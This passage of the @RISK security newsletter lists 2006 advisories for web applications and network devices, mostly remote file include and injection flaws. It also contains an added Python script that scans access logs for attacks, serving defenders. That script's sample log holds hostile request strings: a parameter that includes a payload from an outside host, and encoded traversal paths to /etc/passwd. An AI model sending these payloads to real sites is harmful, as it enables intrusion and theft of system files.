  • Ref: http://www.securityfocus.com/bid/21638

  • 06.51.46 - CVE: CVE-2006-6481
  • Platform: Web Application
  • Title: Clam Anti-Virus Attachment Wrapping Denial of Service
  • Description: ClamAV is an antivirus application. It is vulnerable to a denial of service issue due to insufficient handling of attachments. ClamAV versions 0.88.6 and earlier are vulnerable.
  • Ref: http://kolab.org/security/kolab-vendor-notice-14.txt http://www.quantenblog.net/security/virus-scanner-bypass

  • 06.51.47 - CVE: Not Available
  • Platform: Web Application
  • Title: WeBWorK Program Generation Language Macro Security Restriction Bypass
  • Description: WeBWorK Program Generation (PG) Language is a support application for WeBWorK. It is exposed to a security restriction bypass issue because it fails to properly enforce the restrictions intended to prevent attackers from running arbitrary script code on affected computers. WeBWorK versions prior to 2.3.1 are affected.
  • Ref: http://www.securityfocus.com/bid/21614

  • 06.51.48 - CVE: CVE-2006-6598
  • Platform: Web Application
  • Title: Torrentflux-B4RT Viewnfo.PHP Directory Traversal
  • Description: Torrentflux-B4RT is a web-based front end for the Torrentflux application. It is vulnerable to a directory traversal issue due to insufficient sanitization of user-supplied input to the "path" parameter of the "viewnfo.php" script. Torrentflux-B4RT versions prior to 2.1-b4rt-97 are vulnerable.
  • Ref: http://www.securityfocus.com/bid/21613

  • 06.51.49 - CVE: CVE-2006-6645
  • Platform: Web Application
  • Title: mxBB Web Links Module MX_Root_Path Remote File Include
  • Description: The web links module for the mxBB bulletin board adds categorized links functionality to the portal application. It is vulnerable to a remote file include issue due to insufficient sanitization of user-supplied input to the "mx_root_path" parameter of the "modules/mx_links/language/lang_english/lang_admin.php" script. mxBB web links module version 2.05 is vulnerable.
  • Ref: http://www.securityfocus.com/bid/21622

  • 06.51.50 - CVE: Not Available
  • Platform: Web Application
  • Title: mxBB Charts Module Module_Root_Path Remote File Include
  • Description: The Charts module for the mxBB bulletin board adds chart functionality to the portal application. It is prone to a remote file include vulnerability because it fails to sufficiently sanitize user-supplied input to the "module_root_path" parameter of the "modules/mx_charts/charts_constants.php" script. mxBB Version 1.0.0 is vulnerable to this issue and other versions may also be affected.
  • Ref: http://www.securityfocus.com/bid/21623

  • 06.51.51 - CVE: Not Available
  • Platform: Web Application
  • Title: Bandwebsite Unauthorized Administrative Account Creation
  • Description: Bandwebsite is a web-based content management framework designed to allow music bands to easily create web sites. It is exposed to an unauthorized administrative account creation issue because the "admin.php" script fails to sufficiently validate user-supplied input. Bandwebsite version 1.5 is affected.
  • Ref: http://www.securityfocus.com/bid/21625

  • 06.51.52 - CVE: Not Available
  • Platform: Web Application
  • Title: ScriptMate User Manager Default.ASP Multiple HTML Injection Vulnerabilities
  • Description: ScriptMate User Manager is a platform for registering and managing members and for securing ASP pages. It is prone to multiple HTML injection vulnerabilities due to insufficient sanitization of the "members_username" and "members_password" parameters of "/smusermanager/members/default.asp". ScriptMate User Manager version 2.1 is reportedly vulnerable.
  • Ref: http://www.securityfocus.com/bid/21472

  • 06.51.53 - CVE: Not Available
  • Platform: Web Application
  • Title: Yaplap Ldap.PHP Remote File Include
  • Description: The Yaplap application is an LDAP administration tool. It is vulnerable to a remote file include issue due to insufficient sanitization of user-supplied input to the "LOGIN_style" parameter of the "ldap.php" script. Yaplap versions 0.6 and 0.6.1 are affected.
  • Ref: http://www.securityfocus.com/bid/21599

  • 06.51.54 - CVE: Not Available
  • Platform: Web Application
  • Title: AR_Memberscript UserCP_menu.PHP Remote File Include
  • Description: The AR_Memberscript application is a tool for managing memberships. It is exposed to a remote file include issue due to insufficient sanitization of user-supplied input to the "script_folder" parameter of the "usercp_menu.php" script.
  • Ref: http://www.milw0rm.com/exploits/2931 http://www.securityfocus.com/bid/21600/info

  • 06.51.55 - CVE: Not Available
  • Platform: Web Application
  • Title: EyeOS Aplic.PHP Arbitrary File Upload
  • Description: EyeOS is a content management system. It is vulnerable to an arbitrary file upload issue due to insufficient sanitization of user-supplied input to the "apps/eyeHome.eyeapp/aplic.php" script. EyeOS versions prior to 0.9.3-3 are affected.
  • Ref: http://www.securityfocus.com/bid/21639

  • 06.51.56 - CVE: Not Available
  • Platform: Web Application
  • Title: VerliAdmin Index.PHP Remote File Include
  • Description: VerliAdmin is an administration tool for the VerliHub application. The application is exposed to a remote file include issue due to insufficient sanitization of user-supplied input to the "q" parameter of the "index.php" script. VerliAdmin version 0.3 is affected.
  • Ref: http://www.securityfocus.com/bid/21640

  • 06.51.57 - CVE: Not Available
  • Platform: Web Application
  • Title: Drupal Project and Project Issues Tracking Modules Multiple HTML Injection Vulnerabilities
  • Description: The Drupal Project and Project Issue Tracking modules are project management modules for the Drupal content management system. They are vulnerable to multiple HTML injection issues due to insufficient sanitization of user-supplied data in various unspecified fields that should be filtered through Drupal's "check_plain()" function before output. See the advisory for further details.
  • Ref: http://drupal.org/node/103943

  • 06.51.58 - CVE: Not Available
  • Platform: Web Application
  • Title: KDE LibkHTML NodeType Function Denial of Service
  • Description: KDE libkhtml is an HTML parsing library used by applications such as Konqueror and KMail. It is exposed to a denial of service issue in the "nodeType()" function. KDE libkhtml version 4.2, KDE Konqueror version 3.5.2 and KDE KMail version 1.9.1 are affected.
  • Ref: http://www.securityfocus.com/bid/21662

  • 06.51.59 - CVE: Not Available
  • Platform: Web Application
  • Title: PHPFanBase Protection.PHP Remote File Include
  • Description: PHPFanBase is prone to a remote file include vulnerability because it fails to sufficiently sanitize user-supplied input to the "siteurl" parameter of the "protection.php" script. All current versions are affected.
  • Ref: http://www.securityfocus.com/bid/21664

  • 06.51.60 - CVE: Not Available
  • Platform: Web Application
  • Title: phpProfiles Multiple Remote File Include Vulnerabilities
  • Description: phpProfiles is a web-based application. It is vulnerable to multiple remote file include issues due to improper sanitization of user-supplied input to various scripts. phpProfiles versions 3.1.2b and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/21667

  • 06.51.61 - CVE: Not Available
  • Platform: Web Application
  • Title: cwmCounter Statistic.PHP Remote File Include
  • Description: cwmCounter is a PHP based application that keeps track of the number of visitors visiting a web site. Insufficient sanitization of the "path" parameter of the "statistic.php" script exposes the application to a remote file include issue. cwmCounter version 5.1.1 is affected.
  • Ref: http://www.securityfocus.com/bid/21671

  • 06.51.62 - CVE: Not Available
  • Platform: Web Application
  • Title: Typo3 Class.TX_RTEHTMLArea_PI1.PHP Multiple Remote Command Execution Vulnerabilities
  • Description: TYPO3 is a content management system. It is vulnerable to multiple issues that permit the execution of arbitrary system commands due to insufficient sanitization of user-supplied data to the "userUid" parameter and an unspecified parameter of the "/sysext/rtehtmlarea/pi1/class.tx_rtehtmlarea_pi1.php" script. TYPO3 versions 4.0 to 4.0.3 and 4.1beta are vulnerable; versions 3.7 and 3.8 are also vulnerable if they have the optional "rtehtmlarea" extension installed.
  • Ref: http://www.securityfocus.com/archive/1/454944

  • 06.51.63 - CVE: Not Available
  • Platform: Web Application
  • Title: Valdersoft Shopping Cart Common.PHP Remote File Include
  • Description: Valdersoft Shopping Cart is a PHP based shopping cart application. It is prone to a remote file include vulnerability due to insufficient sanitization of the "commonIncludePath" parameter of the "common.php" script. Valdersoft Shopping Cart version 3.0 is reportedly vulnerable.
  • Ref: http://www.securityfocus.com/bid/21685

  • 06.51.64 - CVE: Not Available
  • Platform: Web Application
  • Title: Computer Associates Multiple CleverPath Portal Environments Session Hijacking
  • Description: Computer Associates CleverPath Portal environments are web-based portal applications. They are exposed to a session hijacking issue when multiple CleverPath Portal environments share a common data store at the same time. Computer Associates Workload Control Center versions 1.0 SP4 and prior are affected.
  • Ref: http://supportconnectw.ca.com/public/ca_common_docs/cpportal_secnot.asp

  • 06.51.65 - CVE: Not Available
  • Platform: Web Application
  • Title: cwmExplorer Index.PHP Source Code Information Disclosure
  • Description: cwmExplorer is a web-based file and folder browsing application implemented in PHP. The application is exposed to an information disclosure issue due to insufficient sanitization of user-supplied input to the "show_file" parameter of the "index.php" script. cwmExplorer version 1.0 is affected.
  • Ref: http://www.securityfocus.com/bid/21683

  • 06.51.66 - CVE: Not Available
  • Platform: Web Application
  • Title: Web-App.Org and Web-App.Net Multiple Input Validation Vulnerabilities
  • Description: Web-APP.org and Web-APP.net are web portal applications. They are affected by multiple cross-site scripting and filter-bypass vulnerabilities. Web-APP.net version 0.9.9.3.4NE and Web-APP.org version 0.9.9.4 are affected.
  • Ref: http://www.securityfocus.com/bid/21684

  • 06.51.67 - CVE: CVE-2006-2658
  • Platform: Web Application
  • Title: Mono XSP Source Code Information Disclosure
  • Description: XSP is a web server designed to serve ASP.NET applications. It is vulnerable to a source code disclosure issue due to insufficient sanitization of user-supplied input. Mono XSP version 2.0 rev 68766 resolves this issue.
  • Ref: http://www.securityfocus.com/archive/1/454962

  • 06.51.68 - CVE: Not Available
  • Platform: Web Application
  • Title: TextSend Sender.PHP Remote File Include
  • Description: TextSend is an SMS messaging script. It is vulnerable to a remote file include issue due to insufficient sanitization of user-supplied input to the "ROOT_PATH" parameter of the "config/sender.php" script. Version 1.5 is affected.
  • Ref: http://www.securityfocus.com/bid/21690

  • 06.51.69 - CVE: Not Available
  • Platform: Web Application
  • Title: PgmReloaded Multiple Remote File Include Vulnerabilities
  • Description: PgmReloaded is a simple CMS for e-commerce sites and generic web catalogs. It is exposed to multiple remote file include vulnerabilities because it fails to sufficiently sanitize user-supplied input to multiple parameters of different scripts. Version 0.8.5 is affected.
  • Ref: http://www.securityfocus.com/bid/21696

  • 06.51.70 - CVE: Not Available
  • Platform: Web Application
  • Title: Newxooper Mapage.PHP Remote File Include
  • Description: Newxooper is a web-based content management system (CMS). It is prone to a remote file include issue because it fails to sufficiently sanitize user-supplied input to the "chemin" parameter of the "mapage.php" script. Newxooper version 0.9.1 is vulnerable and other versions may also be affected.
  • Ref: http://www.milw0rm.com/exploits/2970
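
Most of the web application entries in this issue (45, 49, 50, 53, 54, 56, 59, 60, 61, 63, 68, 69, 70) are remote file include flaws in PHP scripts, and entry 48 is a directory traversal in a "path" parameter. The following is an added example, not code from any of the projects listed, of how a defender can sweep web server access logs for both patterns: a query parameter whose value is an absolute URL to a host the site does not own (the classic RFI payload), or one that contains a "../" sequence after percent-decoding. The log lines, IP addresses and hostnames below are constructed for illustration and do not come from any advisory.

```python
"""Flag remote-file-include and directory-traversal attempts in web access logs.

Added example; the sample log lines, addresses and hostnames are constructed.
"""
import re
from typing import Optional
from urllib.parse import parse_qsl, unquote, urlsplit

# Combined Log Format: client ident user [time] "METHOD url HTTP/x.y" status bytes ...
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# URL schemes PHP's include()/require() will fetch when allow_url_include is on.
REMOTE_SCHEMES = ("http", "https", "ftp")

# A ".." path component bounded by slashes (or the string ends), either slash style.
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")


def decode_param(value: str, rounds: int = 2) -> str:
    """Percent-decode repeatedly so %2e%2e%2f and %252e%252e%252f both become '../'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_param(name: str, value: str, own_hosts: frozenset) -> Optional[str]:
    """Return 'rfi', 'traversal' or None for a single query parameter value."""
    v = decode_param(value)
    parts = urlsplit(v)
    host = (parts.hostname or "").lower()
    if parts.scheme.lower() in REMOTE_SCHEMES and host and host not in own_hosts:
        return "rfi"
    if TRAVERSAL_RE.search(v):
        return "traversal"
    return None


def scan_log(lines, own_hosts=frozenset()):
    """Parse access-log lines and return one finding per suspicious parameter."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected format; skip rather than guess
        url = urlsplit(m["url"])
        # parse_qsl performs the first percent-decode; classify_param does the rest
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            kind = classify_param(name, value, own_hosts)
            if kind:
                findings.append({
                    "src": m["src"],
                    "script": url.path,
                    "param": name,
                    "value": decode_param(value),
                    "kind": kind,
                })
    return findings


# Constructed sample log: two RFI attempts, two traversal attempts, two benign requests.
SAMPLE_LOG = [
    '203.0.113.9 - - [21/Dec/2006:10:14:02 +0000] "GET /counter/statistic.php?path=http://198.51.100.7/s.txt? HTTP/1.1" 200 512',
    '203.0.113.9 - - [21/Dec/2006:10:14:05 +0000] "GET /tf/viewnfo.php?path=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1204',
    '198.51.100.23 - - [21/Dec/2006:10:15:11 +0000] "GET /azucar/admin/index_sitios.php?_VIEW=ftp%3A%2F%2F198.51.100.7%2Fx HTTP/1.0" 200 77',
    '192.0.2.44 - - [21/Dec/2006:10:16:40 +0000] "GET /tf/viewnfo.php?path=downloads/release.nfo HTTP/1.1" 200 3000',
    '192.0.2.44 - - [21/Dec/2006:10:17:01 +0000] "GET /portal/index.php?q=http://www.example.org/news HTTP/1.1" 200 9000',
    '203.0.113.9 - - [21/Dec/2006:10:18:30 +0000] "GET /tf/viewnfo.php?path=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1204',
]

if __name__ == "__main__":
    # www.example.org is treated as our own host, so a URL pointing at it is not an RFI.
    for f in scan_log(SAMPLE_LOG, own_hosts=frozenset({"www.example.org"})):
        print(f"{f['kind']:9} {f['src']:15} {f['script']} {f['param']}={f['value']!r}")
```

Parameters that legitimately carry URLs (return-to pages, feed readers) will show up as "rfi" unless their hosts are in own_hosts, so tune that set, or restrict the check to parameter names the advisories name ("path", "mx_root_path", "ROOT_PATH", "chemin" and so on), before running it against a busy site. Note also that a status of 200 on the RFI or traversal request says nothing about success; the script's return value decides that, not the web server.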

  • 06.51.71 - CVE: CVE-2006-6589
  • Platform: Web Application
  • Title: OFBiz Search_String Parameter HTML Injection
  • Description: OFBiz is an e-commerce solution implemented in Java. The application is prone to an HTML injection issue because it fails to properly sanitize user-supplied input to the "SEARCH_STRING" parameter, used when performing searches, before including it in dynamically generated content. OFBiz version 3.0.0 and opentaps version 0.9.3 are affected.
  • Ref: https://issues.apache.org/jira/browse/OFBIZ-260

  • 06.51.72 - CVE: Not Available
  • Platform: Web Application
  • Title: Calacode @Mail Webmail Filtering Engine HTML Injection
  • Description: Calacode @Mail is a web-based email client. It is exposed to an HTML injection issue due to improper sanitization of user-supplied input in the "Global.pm" perl module. CalaCode @Mail Webmail version 4.51 is affected.
  • Ref: http://www.securityfocus.com/bid/21708/info

  • 06.51.73 - CVE: Not Available
  • Platform: Web Application
  • Title: Hitachi Soumu Workflow Multiple Remote Authentication Bypass Vulnerabilities
  • Description: Hitachi Soumu Workflow is an application for workflow productivity. The application is exposed to multiple authentication bypass vulnerabilities because of a flaw in its authentication process. Hitachi Soumu Workflow versions 3.0 and prior are affected.
  • Ref: http://www.hitachi-support.com/security_e/vuls_e/HS06-016_e/01-e.html

  • 06.51.74 - CVE: Not Available
  • Platform: Network Device
  • Title: Allied Telesis AT-9000/24 Ethernet Switch Unauthorized Management VLAN Access
  • Description: Allied Telesis AT-9000/24 devices are managed Ethernet switches. They are prone to an unauthorized management VLAN access issue. When multiple VLANs are configured, attackers can access the management VLAN by guessing the IP configuration that the management interface is configured to respond to.
  • Ref: http://www.securityfocus.com/bid/21628

  • 06.51.75 - CVE: CVE-2006-3896
  • Platform: Network Device
  • Title: NeoScale Systems CryptoStor Tape 700 Series Appliance SmartCard Authentication Bypass
  • Description: CryptoStor Tape is a tape backup encryption appliance. It is vulnerable to an unspecified authentication bypass issue. CryptoStor 700 series appliances with firmware versions prior to 2.6 are vulnerable.
  • Ref: http://www.kb.cert.org/vuls/id/339004

  • 06.51.76 - CVE: Not Available
  • Platform: Network Device
  • Title: HP Printer FTP Print Server List Command Buffer Overflow
  • Description: HP FTP Print Server is an application that allows computers to print to various printers over FTP. It is vulnerable to a buffer overflow issue because it does not properly handle "LIST" and "NLST" commands with overly long arguments. See the advisory for further details.
  • Ref: http://www.securityfocus.com/archive/1/454817

(c) 2006. All rights reserved. The information contained in this newsletter, including any external links, is provided "AS IS," with no express or implied warranty, for informational purposes only. In some cases, copyright for material in this newsletter may be held by a party other than Qualys (as indicated herein) and permission to use such material must be requested from the copyright owner.

Subscriptions: @RISK is distributed free of charge to people responsible for managing and securing information systems and networks. You may forward this newsletter to others with such responsibility inside or outside your organization.